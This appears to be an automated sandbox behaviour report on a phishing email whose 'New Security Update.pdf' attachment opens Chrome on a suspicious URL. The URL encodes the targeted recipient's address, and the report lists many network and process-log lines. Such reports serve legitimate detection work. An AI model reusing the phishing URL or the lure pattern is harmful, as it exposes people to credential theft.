    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54204
    Source: unknownNetwork traffic detected: HTTP traffic on port 56326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54210
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 54196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 54219 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56297 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 54211 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54219
    Source: unknownNetwork traffic detected: HTTP traffic on port 56249 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54214
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54213
    Source: unknownNetwork traffic detected: HTTP traffic on port 54205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54212
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54211
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54218
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54217
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54216
    Source: unknownNetwork traffic detected: HTTP traffic on port 56290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56244
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56245
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54221
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54220
    Source: unknownNetwork traffic detected: HTTP traffic on port 54228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54186
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54185
    Source: unknownNetwork traffic detected: HTTP traffic on port 56246 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56315 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56250 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54225
    Source: unknownNetwork traffic detected: HTTP traffic on port 54220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54224
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54223
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54222
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54229
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56246
    Source: unknownNetwork traffic detected: HTTP traffic on port 56303 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54228
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56247
    Source: unknownNetwork traffic detected: HTTP traffic on port 54202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54227
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54226
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56249
    Source: unknownNetwork traffic detected: HTTP traffic on port 56321 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54195
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56253
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54194
    Source: unknownNetwork traffic detected: HTTP traffic on port 56289 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56300 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54192
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56250
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54197
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54230
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56251
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54196
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56252
    Source: unknownNetwork traffic detected: HTTP traffic on port 56318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54217 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54191
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54190
    Source: unknownNetwork traffic detected: HTTP traffic on port 54194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54213 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56253 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56257
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56258
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56259
    Source: unknownNetwork traffic detected: HTTP traffic on port 54226 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56300
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56262
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56263
    Source: unknownNetwork traffic detected: HTTP traffic on port 54210 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56311 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56309
    Source: unknownNetwork traffic detected: HTTP traffic on port 56248 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56273 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56301
    Source: unknownNetwork traffic detected: HTTP traffic on port 54204 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56303
    Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56311
    Source: unknownNetwork traffic detected: HTTP traffic on port 54229 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56273
    Source: unknownNetwork traffic detected: HTTP traffic on port 56245 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56262 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56316 -> 443
    Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54185 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54190 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54195 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:56244 version: TLS 1.2
    Source: classification engineClassification label: mal68.phis.winMSG@64/47@58/275
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240827T1154510828-1876.etl
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "AE84D475-9D90-4699-AC09-546AA3816293" "D5AC2D48-97CD-47FA-8517-B1F27648D3AF" "1876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\QD6UVN5U\New Security Update.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1596,i,9170700212267717821,16395113202581352541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "AE84D475-9D90-4699-AC09-546AA3816293" "D5AC2D48-97CD-47FA-8517-B1F27648D3AF" "1876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding EC48120CDBD806B31B366D243B485551
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1928,i,7679209889696324048,15971971168667836464,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\QD6UVN5U\New Security Update.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1596,i,9170700212267717821,16395113202581352541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1928,i,7679209889696324048,15971971168667836464,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1816,i,15692130149549399329,3202881519042920722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://privacy.microsoft.com/en-us/privacystatement
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1648,i,18346115663878279960,8781314979337182349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1816,i,15692130149549399329,3202881519042920722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://privacy.microsoft.com/en-us/privacystatement
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1648,i,18346115663878279960,8781314979337182349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
